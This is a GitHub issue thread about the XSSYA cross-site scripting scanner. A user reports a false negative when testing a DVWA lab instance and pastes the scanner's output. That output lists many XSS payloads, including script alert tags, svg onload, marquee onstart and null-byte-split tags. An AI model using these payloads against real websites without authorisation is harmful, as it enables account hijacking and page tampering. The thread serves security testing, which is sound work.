Hax0rG1rl
commented
10 years ago The XSS patterns pictures. From some security reasons, github don't let me to have them narrowed down as clear text.
Open Hax0rG1rl opened 10 years ago
Hax0rG1rl
commented
10 years ago The XSS patterns pictures. From some security reasons, github don't let me to have them narrowed down as clear text.
yehia-mamdouh
commented
7 years ago Check XSSYA V2 https://github.com/yehia-mamdouh/XSSYA-V-2.0
Hi,
I've just test this one into the following test scenario:
The used patterns were and
"
Enter A Vulnerable Link: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=
XSSYA - M E N U
XSS Scanner
Enter your choice [1-2] : 1
Date: Tue, 05 Aug 2014 07:34:02 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.25 X-Powered-By: PHP/5.4.25 Set-Cookie: PHPSESSID=e2to1m5drn7o6q7t1n143mk5h4; path=/ Expires: Tue, 23 Jun 2009 12:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: security=low Content-Length: 1224 Connection: close Content-Type: text/html;charset=utf-8 "
It has been determined by the application that the link is not vulnerable to XSS which is not true.
Here are the application output: " Scanning The Host: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name= [+] Loaded: 28 payloads
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name= Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name='';!--"=&{()}
Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E<scr Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=</script><script>alert(1)</script> Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<scri%00pt>alert(1);</scri%00pt> Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<scri%00pt>confirm(0);</scri%00pt> Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=5rt(0);'>rhainfosec Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<marquee/onstart=confirm(2)> Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=XSS Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<svg/onload=prompt(1);> Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Save Page CODE:? y
Print HTML CODE:? y Date: Tue, 05 Aug 2014 07:36:37 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.25 X-Powered-By: PHP/5.4.25 Set-Cookie: PHPSESSID=0l288no7jicbm4u69df3ksqjf6; path=/ Expires: Tue, 23 Jun 2009 12:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: security=low Content-Length: 1224 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">